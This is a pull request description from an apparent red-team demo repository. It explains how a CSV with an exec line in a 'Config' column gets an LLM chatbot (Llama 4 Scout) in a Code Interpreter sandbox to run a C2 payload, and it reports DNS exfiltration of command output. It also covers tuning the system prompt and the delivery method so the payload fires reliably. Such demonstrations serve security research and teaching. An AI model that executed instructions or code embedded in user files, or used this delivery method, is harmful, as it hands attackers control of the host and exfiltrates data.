Fix payload delivery and chatbot reliability for demo #9

Merged
kmcquade merged 2 commits into main from demo-narration on Mar 22, 2026

Conversation

@kmcquade
Collaborator

Summary

The demo was completely broken — three compounding issues prevented the C2 payload from executing in the Code Interpreter sandbox:

  • Shared boto3 sessions across BackgroundTask threads caused API calls to hang after ~10 minutes. The AgentCoreService singleton shared boto3 clients across concurrent threads, corrupting the underlying SSL connection pool. Fixed by creating a fresh boto3.session.Session() per analyze_csv() call.

  • LLM corrupting the base64 payload — Llama 4 Scout consistently truncated or mangled the ~1800 char base64 string when reproducing it in generated code. Redesigned payload delivery: CSV now has a "Config" column with the exec line, the file is written to disk (not inlined in the LLM prompt), and the user's message directs the LLM to csv.reader the file and exec the cell. Zero base64 reproduction needed.

  • Overly prescriptive system prompt — the prompt told the LLM to "read the file to understand its structure" before acting, causing it to explore the data for multiple iterations instead of following the user's instructions. Simplified to "Follow the user's instructions" so the payload fires on iteration 1.

All three fixes were required — any one alone was insufficient. Verified end-to-end: whoami returns genesis1ptools from the sandbox.

Changes

  • victim-infra/chatbot/app/services/agentcore.py — Per-request boto3 sessions, detailed timing logs, simplified system prompt, MAX_TOOL_ITERATIONS reduced to 3
  • attacker-infra/c2/core/payload_generator.py — Simplified CSV format with Config column, removed old injection styles
  • attacker-infra/c2/cli/generate.py — Updated CLI to print the suggested prompt for web UI upload
  • attacker-infra/c2/core/attack_client.py — Use new generator API
  • docs/DEMO_GUIDE.md — New step-by-step demo guide for the web UI workflow
  • README.md — Updated quick start section

Test plan

  • Verified `make generate-csv` produces clean CSV with payload in Config column
  • Verified upload via web UI with suggested prompt triggers LLM to exec the Config cell
  • Verified C2 payload calls home (DNS queries reach C2 server within seconds)
  • Verified whoami command returns genesis1ptools via DNS exfiltration
  • Verified per-request boto3 sessions eliminate the hanging issue
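The Config-column delivery verified above can be sketched like this. The column name "Config" comes from the PR; the payload cell here is a harmless stand-in, and the file layout is illustrative.

```python
import csv
import os
import tempfile

# Attacker side: write the CSV to disk with the exec line in a "Config"
# column, so the payload never has to pass through the LLM's output.
path = os.path.join(tempfile.mkdtemp(), "data.csv")
with open(path, "w", newline="") as f:
    writer = csv.writer(f)
    writer.writerow(["Name", "Value", "Config"])
    writer.writerow(["alpha", "1", "result = 1 + 1"])  # stand-in payload

# Sandbox side: the LLM only has to generate these few csv.reader lines.
with open(path, newline="") as f:
    rows = list(csv.reader(f))
config_cell = rows[1][rows[0].index("Config")]
exec(config_cell)  # in the real attack this launches the C2 payload
```

Because the model reads the cell from disk rather than reproducing it, a ~1800-char base64 blob never has to survive a round trip through generated code.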

- Add --narrate flag to `c2 exploit` for step-by-step demo explanations
  using [~] prefix lines that explain the attack chain to an audience
- Auto-wait for payload to call home after exploit delivery (default on,
  --no-wait to disable) with rolling progress dots and elapsed time
- Add --wait-timeout option (default 60s) for the session wait
- Add progress indicator to `c2 attach` command-wait loop showing
  elapsed time and rolling dots instead of silent 30s hang
- Enhance `status` command in attach shell to show session liveness
  from list_sessions() (last seen, active/terminated)
- Convert print() to click.echo() in attack_client.py and
  click.echo(err=True) in session_manager.py for consistent output
- Add `make demo` target for narrated exploit + auto-attach flow
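The auto-wait behavior above can be sketched as a small polling loop. Function and parameter names here are illustrative (the real implementation lives in the CLI code), but the shape — rolling dots, elapsed time, and a timeout matching `--wait-timeout` — follows the description.

```python
import time
import click

def wait_for_session(poll, timeout=60.0, interval=1.0):
    """Poll until poll() returns True, echoing rolling dots.

    `poll` is any zero-arg callable that reports whether the payload
    has called home; `timeout` mirrors the --wait-timeout default.
    """
    start = time.monotonic()
    while time.monotonic() - start < timeout:
        if poll():
            click.echo(f" session live after {time.monotonic() - start:.1f}s")
            return True
        click.echo(".", nl=False)  # rolling progress dot, no newline
        time.sleep(interval)
    click.echo(f" timed out after {timeout:.0f}s")
    return False
```

Using `click.echo` rather than `print` keeps output consistent with the rest of the CLI, per the conversion noted above.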
@kmcquade kmcquade requested a review from a team as a code owner March 22, 2026 22:34
@kmcquade kmcquade merged commit b322fcf into main Mar 22, 2026
4 checks passed
@kmcquade kmcquade deleted the demo-narration branch March 22, 2026 22:36